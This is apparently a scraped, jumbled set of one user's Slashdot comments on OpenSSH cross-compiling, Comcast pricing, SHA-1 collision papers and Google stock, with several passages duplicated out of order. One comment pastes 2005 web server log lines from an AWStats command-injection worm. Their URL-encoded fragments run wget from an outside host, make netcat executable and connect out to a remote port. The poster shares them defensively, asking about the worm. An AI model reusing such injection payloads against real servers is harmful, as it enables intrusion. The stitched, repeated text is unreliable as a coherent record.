And like last time, I told you that the problem is simply that OpenSSH wants to compile and run the binary during its tests. You do not need a cross-compile environment to fix this. There are too many "tests" that require running the binary for me to fix up into a nice package. They are easy to spot but tedious to correct/hack for each release.
And like last time, I gave you the necessary information for you to find it. I don't have the time to hold your hand, nor formulate a good looking patch for you. And I'm damned sure that I'm not going to give out my contact information when your team and its sympathizers are full of immature brats.
I've since recommended a different solution and moved on to a different project.
You are completely correct. This is OpenSSH's problem. Patches not getting folded in, responses like "where's YOUR patch, pickledick?", and the utter lack of OpenSSH programmers taking the initiative to fix stupid problems like cross-platform compiling on a non-target CPU.
I don't doubt that OpenSSH is enterprise-class when compared with the likes of Microsoft's offerings or SSH Corp., but immature responses from the supposed "OpenSSH developers" that don't further to solve the problems really put people off.
If OpenSSH would clean house of the wannabes and show some initiative and maturity, the OpenSSH team might get more respect from the outsiders.
You worded your statement oddly, so a reader might have some confusion. My apologies in advance if this offends you.
Comcast HSI (High Speed Internet) by itself costs less than HSI + TV. However, if one buys the bundle, HSI gets a discount. But, the discounted HSI + TV still costs more than unbundled HSI!
I'm not sure if anyone already posted the actual paper. ScienceBlog only links to itself and references a future printed publication. Well, here it is:
Thank you for the link and the pointer to the text.
I will concede that there was a link to *one* of the recently published papers, and had I examined every single link, I would have found *one* of those papers, albeit from a non-primary source.
However, you must concede that "The authors have presented a collision for 58-round SHA-1, claimed to be found with 233 hash operations. The paper with a the full attack description is now online. [8]" is missing the reference in the later versions (the one I originally read): http://en.wikipedia.org/w/index.php?title=SHA_hash _functions&oldid=21330286 Note that this phrase "* "Research paper containing the details of the attack on SHA-1" on Cryptome" that you quote is also missing from that version.
As I said in replies further down, the information I was seeking was added to Bruce's blog and to the Wiki *after* I posted my request.
I honestly just wanted to see the papers. Since the links were not there, was my skepticism unfounded? Am I to blindly trust Bruce Schneier? (That may contradict everything I've read from him.)
"EDITED TO ADD: Here are Xiaoyun Wang's two papers from Crypto this week: "Efficient Collision Search Attacks on SHA-0" and "Finding Collisions in the Full SHA-1Collision Search Attacks on SHA1." And here are the rest of her papers."
When I read his blog (when the slashdot article appeared), there was no such reference. Apparently he read my comment. Thanks Bruce.
They don't have direct links. If you consider a link to another Wiki article which links another page which links another page a direct link....
*You* (clap_hands) have not provided any link. Only j1m+5n0w provided a link.
And I apologize to j1m+5n0w because I see that he did provide a direct link to the papers. Neither of which was provided in the article, or Bruce's blog.
But no apologies to you. You're merely trying to stir up trouble (hey! I didn't even reply to you until now, so why did you respond to my response to j1m+5n0w?).
This Chinese research team has yet to publish their proof for the last SHA attacks. Or maybe I missed it? Please show everyone the proof. I honestly want to be able to read the proof. Links, please.
If it's real, withholding information on these attack vectors doesn't make it any safer for the rest of us who use SHA or any other algorithm.
Slashdot Mirror
Or is this a different worm that exploits awstats?
/cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
//cgi/awstats.pl?configdir=|
/cgi-bin/awstats.pl?configdiro %2fnc%3bchmod%20%2bx%20nc%3b.%2 0 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
First scan at my webserver:
xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET
Second scan:
xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET
%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:
xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET
=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.r
2fnc%20something4u.propagation.net%2065000%20%7c%
And like last time, I told you that the problem is simply that OpenSSH wants to compile and run the binary during its tests. You do not need a cross-compile environment to fix this. There are too many "tests" that require running the binary for me to fix up into a nice package. They are easy to spot but tedious to correct/hack for each release.
And like last time, I gave you the necessary information for you to find it. I don't have the time to hold your hand, nor formulate a good looking patch for you. And I'm damned sure that I'm not going to give out my contact information when your team and its sympathizers are full of immature brats.
I've since recommended a different solution and moved on to a different project.
You are completely correct. This is OpenSSH's problem. Patches not getting folded in, responses like "where's YOUR patch, pickledick?", and the utter lack of OpenSSH programmers taking the initiative to fix stupid problems like cross-platform compiling on a non-target CPU.
I don't doubt that OpenSSH is enterprise-class when compared with the likes of Microsoft's offerings or SSH Corp., but immature responses from the supposed "OpenSSH developers" that don't further to solve the problems really put people off.
If OpenSSH would clean house of the wannabes and show some initiative and maturity, the OpenSSH team might get more respect from the outsiders.
"- Exactly what would Mr Smartypants have had us do with the money?"
He would've put it in his pants and done the SmartyDance. Oooh Ah.
Interesting. Out here in San Jose, CA it's the way I've described. Must be regional...
You worded your statement oddly, so a reader might have some confusion. My apologies in advance if this offends you.
Comcast HSI (High Speed Internet) by itself costs less than HSI + TV. However, if one buys the bundle, HSI gets a discount. But, the discounted HSI + TV still costs more than unbundled HSI!
Did anyone else wonder why a pizza chain was commenting on a computer company?
So true. Just like OpenSSH.
I'm not sure if anyone already posted the actual paper. ScienceBlog only links to itself and references a future printed publication. Well, here it is:
X -13-1-82
http://www.opticsexpress.org/abstract.cfm?URI=OPE
You're still badgering me. I pointed out the version that I read and you're still acting like a troll.
I won't apologize to you. You are a troll.
Thank you for the link and the pointer to the text.
h _functions&oldid=21330286
I will concede that there was a link to *one* of the recently published papers, and had I examined every single link, I would have found *one* of those papers, albeit from a non-primary source.
However, you must concede that "The authors have presented a collision for 58-round SHA-1, claimed to be found with 233 hash operations. The paper with a the full attack description is now online. [8]" is missing the reference in the later versions (the one I originally read):
http://en.wikipedia.org/w/index.php?title=SHA_has
Note that this phrase "* "Research paper containing the details of the attack on SHA-1" on Cryptome" that you quote is also missing from that version.
Proof?
You didn't even read my comment. Pot. Kettle. Black.
As I said in replies further down, the information I was seeking was added to Bruce's blog and to the Wiki *after* I posted my request.
I honestly just wanted to see the papers. Since the links were not there, was my skepticism unfounded? Am I to blindly trust Bruce Schneier? (That may contradict everything I've read from him.)
I forgot to add, the Wiki was updated with the papers only AFTER I posted my question.
(cur) (last) 01:48, 19 August 2005 Matt Crypto (links for CRYPTO 2005 papers)
Possibly Matt Crypto read my comment. Thank you Matt Crypto.
quoth Schneier's blog:
"EDITED TO ADD: Here are Xiaoyun Wang's two papers from Crypto this week: "Efficient Collision Search Attacks on SHA-0" and "Finding Collisions in the Full SHA-1Collision Search Attacks on SHA1." And here are the rest of her papers."
When I read his blog (when the slashdot article appeared), there was no such reference. Apparently he read my comment. Thanks Bruce.
By the way, clap_hands, you're still a troll.
As I said in another reply, my apologies to you j1m+5n0w. While the article does not have any useful links, you did provide a link to the papers.
That was the information I was asking for.
They don't have direct links. If you consider a link to another Wiki article which links another page which links another page a direct link....
*You* (clap_hands) have not provided any link. Only j1m+5n0w provided a link.
And I apologize to j1m+5n0w because I see that he did provide a direct link to the papers. Neither of which was provided in the article, or Bruce's blog.
But no apologies to you. You're merely trying to stir up trouble (hey! I didn't even reply to you until now, so why did you respond to my response to j1m+5n0w?).
I didn't miss anything. The Wiki articles just reference Bruce's blog, which doesn't provide any proof.
I don't see how you're modded informative, and I'm modded a troll, since I asked a valid question, and you didn't provide the answer.
Please, *please* provide a link to the proof.
Even the greats like Bruce can get hoaxed.
This Chinese research team has yet to publish their proof for the last SHA attacks. Or maybe I missed it? Please show everyone the proof. I honestly want to be able to read the proof. Links, please.
If it's real, withholding information on these attack vectors doesn't make it any safer for the rest of us who use SHA or any other algorithm.
No useful documentation (provide your own!). No useful support (provide a patch!).
Something tells me that most of these programmers have never worked on a commercial project with a deadline and with other people.
Bunch of arrogant primadonnas. Just like OpenSSH.
There's a stolen car tracking device called LoJack. It's international, too. Of course, you need to have it installed before the car is stolen.
Wow. They're minting money over at Google.
http://finance.yahoo.com/q/it?s=GOOG
Some large option exercise at $0 a share, followed by several smaller sales at market price. Ad infinitum.
Create some stock, sell it. Create some more, sell some more. All the while keeping the same percentage of stock for themselves.
How is the grandparent flamebait and my reply redundant?
Obviously some member doesn't agree with either of us and wants to use his new mod points to silence a point of view.
The moderation is utterly ridiculous. I'm not new here, but it's not any less insane to see it personally.
So if I see some arbitrary absurdity on a line chart than it cancels all meaning of all other studies?
Welcome to American politics.
That technique is used to contradict Global Warming, evolution, environmental studies, and legalities that don't fit arrogant people's ignorant views.